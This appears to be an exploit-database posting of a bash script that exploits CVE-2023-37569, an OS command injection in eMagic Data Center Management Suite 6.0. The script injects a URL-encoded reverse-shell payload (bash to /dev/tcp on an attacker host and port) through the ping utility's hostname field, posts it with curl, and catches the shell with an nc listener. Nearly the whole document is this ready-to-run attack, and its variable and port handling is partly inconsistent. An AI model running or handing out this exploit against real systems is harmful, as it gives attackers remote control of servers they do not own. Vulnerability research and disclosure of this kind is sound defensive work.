Emagic Data Center Management Suite 6.0 Remote Command Execution

2023.08.13
Credit: thewhiteh4t
Risk: High
Local: No
Remote: Yes
CWE: CWE-78

# Exploit Title: Emagic Data Center Management Suite v6.0 - OS Command Injection # Date: 03-08-2023 # Exploit Author: Shubham Pandey & thewhiteh4t # Vendor Homepage: https://www.esds.co.in/enlight360 # Version: 6.0.0 # Tested on: Kali Linux # CVE : CVE-2023-37569 URL=$1 LHOST=$2 LPORT=$3 echo "*****************************" echo "* ESDS eMagic 6.0.0 RCE *" echo "* > CVE-2023-37569 *" echo "* > Shubham & thewhiteh4t *" echo "*****************************" if [ $# -lt 3 ]; then echo """ USAGE : ./exploit.sh http://<IP> <LHOST> <LPORT> ./exploit.sh http://192.168.0.10 192.168.0.20 1337 """ exit 1 fi url="$1/index.php/monitor/operations/utilities/" echo "[+] URL : $URL" echo "[+] LHOST : $LHOST" echo "[+] LPORT : $LPORT" echo payload="bash%20%2Dc%20%27bash%20%2Di%20%3E%26%20%2Fdev%2Ftcp%2F$LHOST%2F$LPORT%200%3E%261%27" post_data="utility=ping&operations=yes&hostname=%3B%20$payload&param_before=&param_after=&probe_id=1&rndval=1682490204846" echo "[!] Triggering exploit..." echo $url (sleep 3; curl -s -X POST -d $post_data $url > /dev/null) & echo "[+] Catching shell..." nc -lvp 4444


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top